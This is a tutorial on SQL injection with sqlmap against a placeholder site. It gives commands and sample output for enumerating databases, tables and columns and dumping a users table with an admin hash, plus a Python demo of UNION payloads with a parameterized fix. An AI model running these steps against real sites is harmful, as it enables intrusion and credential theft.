.:: Educational Purpose Only ::.
What is sqlmap?
sqlmap is one of the most popular and powerful SQL injection automation tools available. Given the URL of an HTTP request with an injectable parameter, sqlmap can fingerprint and exploit the back-end database: enumerate database names, tables and columns, and dump the data in those tables. Under certain conditions (sufficient database privileges and a writable, reachable path on the server) it can even read and write files on the remote file system. It is written in Python, and it is to SQL injection what Metasploit is to exploitation in general.
Vulnerable Url:
http://www.site.com/section.php?id=51
It is prone to SQL injection because the application splices the id parameter into its SQL statement as text instead of binding it as a query parameter (the usual description is that the developer "did not properly escape" it). A quick manual check is to open the URL with a single quote appended:
http://www.site.com/section.php?id=51'
If the quote lands inside the SQL statement unescaped, the query no longer parses and the page typically shows a database error or visibly different content. That is an indicator, not proof: sqlmap confirms injectability by sending many payloads and comparing the responses.
Hacking with sqlmap
In a console, point sqlmap at the URL with the -u option. It tests the parameters in that request (here id) with its injection techniques and reports which parameter is injectable and what the back-end DBMS is:
sqlmap -u http://site.com/index.asp?id=765
Discover Databases
Once sqlmap has confirmed that the URL is injectable, the next step is to enumerate the databases on the server. The --dbs option lists them:
sqlmap -u "http://www.site.com/section.php?id=51" --dbs
and the result looks like this (the "resumed" lines mean sqlmap reused values stored in its session file from an earlier run instead of extracting them again):
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: mywebdb
available databases [2]:
[*] information_schema
[*] mywebdb
Find tables in a particular database
Next, list the tables in a particular database. Say the database of interest is 'mywebdb'; -D selects it and --tables enumerates its tables:
sqlmap -u "http://www.site.com/section.php?id=51" --tables -D mywebdb
The output looks similar to this (the output shown was captured from a different run, which is why it names the database 'safecosmetics' rather than mywebdb):
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables
Get columns of a table
With the table list in hand, the next step is to get the columns of an interesting table. Say the table is 'users' and it holds the usernames and password hashes; -T selects the table and --columns enumerates it:
sqlmap -u "http://www.site.com/section.php?id=51" --columns -D mywebdb -T users
The output looks something like this (again from the 'safecosmetics' run; sqlmap retrieves each column name followed by its type, then prints the summary table):
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!
Get data from a table
Now comes the most interesting part: extracting the data from the table. The command is
sqlmap -u "http://www.site.com/section.php?id=51" --dump -D mywebdb -T users
The above command retrieves every row of that table through the injection point (value by value when only blind techniques work) and also saves the result as a CSV file under sqlmap's output directory. The effect resembles mysqldump, although no direct database connection is involved.
The output might look similar to this
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
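To make the whole chain concrete, here is an added example (not code from the tutorial or from the sqlmap project) that models both the manual single-quote check and what --tables, --columns and --dump do behind the scenes. It uses an in-memory SQLite database as a constructed stand-in for the target's MySQL server: the section table plays the part of section.php?id=51, and a small users table mirrors the admin row in the dump above. SQLite's sqlite_master and pragma_table_info stand in for MySQL's information_schema.tables and information_schema.columns; the function names, table shapes and sample rows are all assumptions of this example. The vulnerable query is shown next to its parameterized fix.

```python
import sqlite3


# Constructed sample data: an in-memory stand-in for the target's database, with the
# "section" table queried by section.php?id=51 and a "users" table shaped like the
# one dumped in the tutorial (only the columns needed here). Not real data.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE section (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, hash TEXT, permission INTEGER);
        INSERT INTO section VALUES (51, 'About us');
        INSERT INTO users VALUES (1, 'admin', '5DIpzzDHFOwnCvPonu', 3);
    """)
    return conn


def section_vulnerable(conn, id_param):
    """Hypothetical model of the flaw behind section.php: the raw id parameter is
    spliced into the SQL text, so a quote or a UNION in it rewrites the query."""
    sql = "SELECT title FROM section WHERE id = " + id_param
    return [row[0] for row in conn.execute(sql)]


def section_fixed(conn, id_param):
    """Hardened form: validate the shape of the id and bind it as a parameter, so the
    database never parses user input as SQL."""
    if not id_param.isdigit():
        return []  # reject anything that is not a plain integer id
    return [row[0] for row in conn.execute(
        "SELECT title FROM section WHERE id = ?", (int(id_param),))]


def probe(conn, id_param):
    """The manual check from the tutorial (id=51'): does the request break the query?
    A parse error here is what an 'error in your SQL syntax' page reveals.
    sqlmap does the same at scale, comparing responses for many payloads."""
    try:
        section_vulnerable(conn, id_param)
        return "ok"
    except sqlite3.OperationalError:
        return "error"


def list_tables_via_injection(conn):
    """Equivalent of --tables: SQLite keeps its schema in sqlite_master (MySQL in
    information_schema.tables). id=0 matches nothing, so only the UNION rows return."""
    payload = "0 UNION SELECT name FROM sqlite_master WHERE type='table'"
    return section_vulnerable(conn, payload)


def list_columns_via_injection(conn, table):
    """Equivalent of --columns (MySQL: information_schema.columns); pragma_table_info
    is SQLite's table-valued pragma that lists a table's column metadata."""
    payload = "0 UNION SELECT name FROM pragma_table_info('%s')" % table
    return section_vulnerable(conn, payload)


def dump_users_via_injection(conn):
    """Equivalent of --dump: the page exposes a single column, so several columns are
    concatenated into that one slot, one result row per user."""
    payload = "0 UNION SELECT name || ':' || hash || ':' || permission FROM users"
    return section_vulnerable(conn, payload)


if __name__ == "__main__":
    db = build_db()
    print("id=51      ->", probe(db, "51"), section_vulnerable(db, "51"))
    print("id=51'     ->", probe(db, "51'"))
    print("tables     ->", list_tables_via_injection(db))
    print("columns    ->", list_columns_via_injection(db, "users"))
    print("dump       ->", dump_users_via_injection(db))
    print("fixed, 51' ->", section_fixed(db, "51'"))
```

The UNION payloads are the simplest case, a visible result column and no filtering; against the real target sqlmap chooses among several techniques (boolean-blind, time-based, error-based, UNION, stacked) depending on what the responses allow, which is why its output arrives value by value in the logs above. The fix is the same regardless of DBMS: never build the statement from the parameter text; bind it.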
That is the whole chain: the dump already gives us the admin account and its password hash.
If you are now asking how to find the injectable "id=" parameter in the first place: run the site through an automated web vulnerability scanner and, if it reports an SQL injection error on some link, use that link as sqlmap's target. Keep in mind that sqlmap only tests the parameters in the request you hand it, so the URL must be one whose parameters actually reach a database query; sqlmap can also spider a site itself with --crawl if you have no scanner output to start from.